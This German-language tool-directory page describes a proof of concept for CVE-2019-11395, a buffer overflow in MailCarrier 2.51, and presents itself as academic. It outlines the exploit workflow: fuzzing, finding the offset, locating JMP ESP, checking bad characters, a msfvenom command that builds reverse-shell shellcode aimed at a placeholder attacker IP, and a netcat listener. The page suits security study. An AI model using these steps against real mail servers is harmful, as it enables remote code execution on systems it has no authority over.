Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-11395 — Proof of Concept zu akademischen Zwecken, um die Buffer-Overflow-Schwachstelle anhand von CVE-2019-11395 zu verstehen. | Kitploit
Tools/GitHubGitHub/rafaelbicas/cve-2019-11395
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeFuzzingLernen & BildungBinary-Exploitation
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

Proof of Concept zu akademischen Zwecken, um die Buffer-Overflow-Schwachstelle anhand von CVE-2019-11395 zu verstehen.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-11395

Übersicht

Dieses Proof of Concept (PoC) demonstriert eine Pufferüberlauf-Schwachstelle in MailCarrier 2.51, die es entfernten Angreifern ermöglicht, über eine lange Zeichenfolge beliebigen Code auszuführen. Die Schwachstelle kann über die folgenden Prozesse ausgenutzt werden:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

Das Projekt zielt darauf ab, einen akademischen Ansatz zum Verständnis der Funktionsweise von Pufferüberläufen zu bieten.


⚠️ Warnungen

Bevor Sie Tests durchführen, verwenden Sie niemals Ihre Produktionsumgebung für erste Experimente. Erstellen Sie stattdessen ein Lab-Setup, das Ihrer Produktionsumgebung ähnelt, um Probleme oder unbeabsichtigte Folgen zu vermeiden.


🔧 Vorbereitung

1. Die Schwachstelle entdecken

  • Nutzen Sie die Fuzzing-Technik, um die ungefähre Anzahl an Bytes zu ermitteln, die erforderlich ist, um die Anwendung zum Absturz zu bringen.

2. Den Offset ermitteln

  • Sobald der Absturz auftritt, verwenden Sie:
    root@kitploit:~
    msf-pattern_create -l <number_of_bytes>
    

Dies hilft, den Offset zu bestimmen, also die genaue Anzahl an Bytes, die benötigt wird, um das EIP zu überschreiben.

  • Verwenden Sie den folgenden Befehl, um den Offset zu bestätigen
    root@kitploit:~
    msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
    

Dies identifiziert die genaue Byte-Anzahl, die erforderlich ist, um das EIP zu kontrollieren.

3. Eine JMP- oder CALL-Anweisung finden

  • Suchen Sie eine Anweisung mit:
    root@kitploit:~
    JMP ESP
    CALL ESP
    

Wir verwenden diese Adresse, um die Ausführung umzuleiten. Seien Sie vorsichtig mit ASLR, SafeSEH oder anderen Schutzmechanismen.

4. Bad Chars identifizieren

  • Verwenden Sie das Mona-Tool in Immunity Debugger, um nach Bad Characters zu suchen.

5. Shellcode generieren

  • Erstellen Sie Shellcode unter Ausschluss der Bad Characters:
    root@kitploit:~
    msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
    

6. NOPs hinzufügen

  • Fügen Sie NOP-Anweisungen (\x90) in den Payload ein, um die Stabilität zu verbessern.

7. Eine Verbindung herstellen

  • Verwenden Sie netcat (nc), um eine Reverse Shell zu erstellen und eine Verbindung zum Ziel herzustellen.
Tool herunterladen